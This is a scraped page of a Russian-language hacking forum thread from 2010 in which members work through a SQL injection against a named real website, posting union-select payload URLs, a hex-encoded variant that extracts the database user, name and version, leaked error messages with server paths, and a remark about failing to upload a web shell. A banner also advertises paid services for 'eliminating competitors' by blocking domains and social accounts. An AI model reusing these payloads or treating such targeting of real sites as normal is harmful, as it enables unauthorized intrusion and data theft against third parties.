УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1215 из 1393

1215

Опции темы

Поиск в этой теме

Опции просмотра

#12141

24.03.2010, 20:26

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

Цитата:

Сообщение от 547

ну на самом деле можно попробовать еще вот этот способ...

http://forum.antichat.ru/threadnav43966-4-10.html

нет не получаеться

#12142

24.03.2010, 20:58

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от LokbatanLi

нет не получаеться

покажи как ты пробовал?

#12143

24.03.2010, 21:22

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

даje не моq пробовать..

#12144

24.03.2010, 22:06

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Отправить сообщение для CyberHunter с помощью ICQ

Цитата:

Почему user() иногда возвращает кавычку?

Выложи ссыль.

#12145

24.03.2010, 22:36

root_sashok

Познавший АНТИЧАТ

Регистрация: 04.08.2008

Сообщений: 1,359

Провел на форуме:
8220635

Репутация: 1593

Отправить сообщение для root_sashok с помощью ICQ

Цитата:

Сообщение от CyberHunter

Выложи ссыль.

Код:

http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--

#12146

24.03.2010, 22:42

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от root_sashok

Код:

http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--

Здесь юзер valesby@localhost и никакой кавычки. С чего ты взял, что там кавычка?

#12147

24.03.2010, 23:02

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Код:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php  on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns

Здесь просто имя юзера после локалхост пишет.

#12148

24.03.2010, 23:10

root_sashok

Познавший АНТИЧАТ

Регистрация: 04.08.2008

Сообщений: 1,359

Провел на форуме:
8220635

Репутация: 1593

Все, разобрался, это value в кавычках. Спасибо.

#12149

24.03.2010, 23:12

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Сообщение от CyberHunter

Код:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php  on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns

Здесь просто имя юзера после локалхост пишет.

Улыбнуло

Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.

Делаем запрос:

Код:

http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version()))

Получаем:

Код:

76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930

Что в HEX:

Код:

valesby@localhost:valesby:5.0.90

Тоесть

Код:

имя_юзера:БД:версия

Проявляем смекалку и нестандартное мышление, товарищи...

Последний раз редактировалось mailbrush; 24.03.2010 в 23:15..

#12150

24.03.2010, 23:34

daniel_1024

Участник форума

Регистрация: 15.07.2009

Сообщений: 158

Провел на форуме:
698831

Репутация: 34

там phpbb - форум

прав не хватает...

шелл не залить

Страница 1215 из 1393

1215

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход